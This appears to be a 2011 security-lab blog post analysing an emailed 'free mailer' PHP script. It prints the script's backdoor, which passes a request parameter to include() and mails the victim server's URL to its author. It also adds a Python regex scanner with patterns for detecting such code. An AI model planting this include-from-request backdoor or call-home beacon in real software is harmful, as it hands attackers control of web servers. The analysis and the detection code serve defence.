MX Lab, http://www.mxlab.eu, started to intercept an interesting exploit based on PHP. The email comes in with the subject "Mexico 2011", is sent from the spoofed address "noreply@prodigy.net.mx" and has the following body:

Attached to the message is a small ZIP file named Mbeta.zip. Once extracted you will have a folder "mailer" with two files inside: Mh.php and Tutorial.txt.
This is the content of the tutorial:
TUTORIAL: descomprime el archivo
1* Guardar el archivo Mh.php (Mailer) en su pc.
2* LO suben a su hosting por FTP
3* Una vez subido al hosting entrar desde la web ej www.sudominio.com/Mh.php
4* Este es la version beta con limitaciones, la version full se vende en el pack.
emaileficaz@yahoo.com
Translated:
TUTORIAL: unzip the file
1* Save the file Mh.php (Mailer) on your PC
2* Upload it to your hosting via FTP
3* Once it is uploaded to the hosting, open it from the web, e.g. www.sudominio.com/Mh.php
4* This is the beta version with limitations; the full version is sold in the pack.
emaileficaz@yahoo.com
When the PHP file is opened on a web server, it shows the following web form:

MX Lab has analyzed the PHP code in the attachment. It appears to be a script for sending out mass mailings, but it also contains additional code that gives the script's author a way in to whatever web server it is installed on:
// Backdoor: a non-empty "x" request parameter is passed straight to include(), so the
// author controls which file (or URL, if allow_url_include is on) the server executes.
if (trim($_GET['x']) != '') { @include($_GET['x']); exit(); }
$email = 'hatuey30@hotmail.com';
// Build the full URL of the installed script from the request itself.
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
// Call home: every page load mails that URL to the author. The "@" hides mail() errors,
// and "\n\n" inside single quotes is sent literally, as seen in the captured email below.
@mail($email, 'Exploit: ' . $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: ' . $y . '\n\n You can use (x=shell_url) at the end of the link
', 'From: ' . $email . ' <' . $email . '>\r\n');
Every time the page is loaded, this code emails the full URL of the installed script (built from HTTP_HOST and REQUEST_URI) to a fixed address, in this case hatuey30@hotmail.com. The first line is the actual backdoor: if the request carries a non-empty x parameter, whatever it names is handed to include(), so the author can make the server execute a file of their choosing. Including a remote URL only works when PHP's allow_url_include setting is enabled, but a local path is included regardless.
For the test we replaced the address with our own and removed the mass mailing feature. The email we received is:
Hey , this is a new victim’s exploit: http://www.mydomain.com/Mh.php\n\n You can use (x=shell_url) at the end of the link
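A hosting provider or site owner who wants to catch this kind of "free mailer" before it goes live can scan uploaded PHP for the two tell-tale constructs shown above: an include()/require() whose argument comes from a request superglobal, and a mail() call that embeds the script's own address ($_SERVER['HTTP_HOST'], 'REQUEST_URI' or 'PHP_SELF'). The scanner below is an added example written for this post; it is not MX Lab's tooling and not part of the Mh.php script. It is a regex heuristic over source lines, not a PHP parser, so it is meant as a triage filter rather than a verdict. The two sample inputs are constructed: the backdoor fragment is the snippet quoted in the post with the extraction damage repaired, and the contact form is an invented benign file for comparison.

```python
import re
from typing import List, Tuple

# Constructed sample 1: the call-home/backdoor fragment quoted in the post,
# with the broken quoting and "$ _GET" spacing repaired.
SAMPLE_BACKDOOR = r"""if (trim($_GET['x'])!=''){@include($_GET['x']);exit();}
$email = 'hatuey30@hotmail.com';
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
@mail($email, 'Exploit: '. $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: '. $y, 'From: '. $email);
"""

# Constructed sample 2: an ordinary contact form that also calls mail() but
# does not include request-controlled files or leak its own URL.
SAMPLE_BENIGN = r"""<?php
require_once __DIR__ . '/config.php';
$to = 'webmaster@example.com';
$msg = htmlspecialchars($_POST['message'] ?? '');
mail($to, 'Contact form', $msg);
"""

# Request-controlled superglobals that should never reach include()/require().
SUPERGLOBALS = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)"

RULES = [
    # include/require whose argument is read directly from a superglobal (file inclusion).
    ("include-from-request",
     re.compile(r"@?\b(?:include|include_once|require|require_once)\s*\(?\s*"
                + SUPERGLOBALS + r"\s*\[")),
    # mail() whose arguments reference the script's own host/path (call-home beacon).
    ("mail-with-own-url",
     re.compile(r"\bmail\s*\([^;]*\$_SERVER\s*\[\s*['\"](?:HTTP_HOST|REQUEST_URI|PHP_SELF)['\"]")),
    # "@" error suppression on risky calls, a common way to keep a backdoor quiet.
    ("error-suppressed-call",
     re.compile(r"@\s*(?:include|require|mail|eval)\b")),
]


def scan_php(source: str) -> List[Tuple[str, int, str]]:
    """Return one (rule_name, line_number, matched_text) tuple per hit."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in RULES:
            for match in pattern.finditer(line):
                findings.append((name, lineno, match.group(0)))
    return findings


def is_suspicious(source: str) -> bool:
    """A file is flagged when it contains either of the two high-confidence patterns.
    Error suppression alone is too common in legitimate code to flag on its own."""
    hits = {name for name, _, _ in scan_php(source)}
    return "include-from-request" in hits or "mail-with-own-url" in hits


if __name__ == "__main__":
    for label, src in (("Mh.php fragment", SAMPLE_BACKDOOR), ("contact form", SAMPLE_BENIGN)):
        print(f"{label}: suspicious={is_suspicious(src)}")
        for name, lineno, text in scan_php(src):
            print(f"  line {lineno}: {name}: {text}")
```

Run it over a directory of uploaded .php files and review anything flagged; the `error-suppressed-call` hits are reported for context but do not by themselves mark a file as suspicious.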
It is clear that with this PHP technique your web server is at risk. So don't be fooled by offers that sound too good to be true, and never install scripts that were sent to you by email, whether PHP, ASP or ColdFusion, on your web server or shared hosting account.
Posted on 03 March 2011. Tags: Base, 2011, contains, datos, Email, Exploit, Mexico, offer
The above information is reprinted from and copyrighted © by MX Lab.